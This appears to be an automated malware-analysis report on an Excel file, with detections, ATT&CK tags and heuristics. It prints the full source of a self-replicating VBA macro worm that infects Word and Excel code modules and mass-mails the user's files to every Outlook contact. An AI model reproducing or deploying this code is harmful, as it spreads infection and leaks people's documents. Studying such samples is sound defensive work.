MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The file is an Excel document containing VBA macros. The macros utilize CreateObject and GetObject calls, and the ClamAV detection indicates it's a known malware variant. The script attempts to download and execute a second-stage payload, as evidenced by the ClamAV detection of an extracted artifact (Win.Worm.VBS-213) and the general behavior of such macro-based threats.
Heuristics 4
-
ClamAV: Doc.Trojan.18th-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.18th-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2622 bytes |
SHA-256: 2280d99d5473584a63d94f801673769324d31c9665b7d16e28809e54ed1df018 |
|||
|
Detection
ClamAV:
Win.Worm.VBS-213
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Hikaru
Dim λ As String, ν As Byte
Private Sub Document_Close()
On Error Resume Next
ρ Application.VBE: ν = 1
ρ GetObject(, "Word.Application").VBE
ρ GetObject(, "Excel.Application").VBE
Send
End Sub
Private Sub ρ(ByRef ο As Object)
For ι = 1 To ο.CodePanes.Count
Set υ = ο.CodePanes(ι).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0) And ν = 0 Then
λ = υ.Lines(1, υ.CountOfLines): ν = 1: ι = 0
End If
If Not υ.Find("~^^~", 0, 0, 0, 0) And ν = 1 Then
ο.CodePanes(ι).CodeModule.InsertLines 1, λ
End If
Next
End Sub
Private Sub Workbook_Deactivate(): Document_Close: End Sub
Private Sub UserForm_Initialize(): Document_Close: End Sub
Private Sub Worksheet_Activate(): Document_Close: End Sub
Private Sub Send()
On Error Resume Next
Set OLA = CreateObject("Outlook.Application")
For Each ALC In OLA.GetNameSpace("MAPI").AddressLists
If ALC.AddressEntries.Count <> 0 Then
Set FSS = OLA.CreateItem(0)
For FSN = 1 To ALC.AddressEntries.Count
FSS.BCC = FSS.BCC & "; " & ALC.AddressEntries(FSN).Address: Next
FSS.Subject = "Virus Alert!!!"
FSS.Body = "New O97M_Hikaru Virus." & Chr(13) & Chr(10) & "Exampler---------->"
FSS.Attachments.Add Application.ActiveWorkbook.FullName
FSS.Attachments.Add Application.ActiveDocument.FullName
FSS.DeleteAfterSubmit = 1
FSS.Send
End If: Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.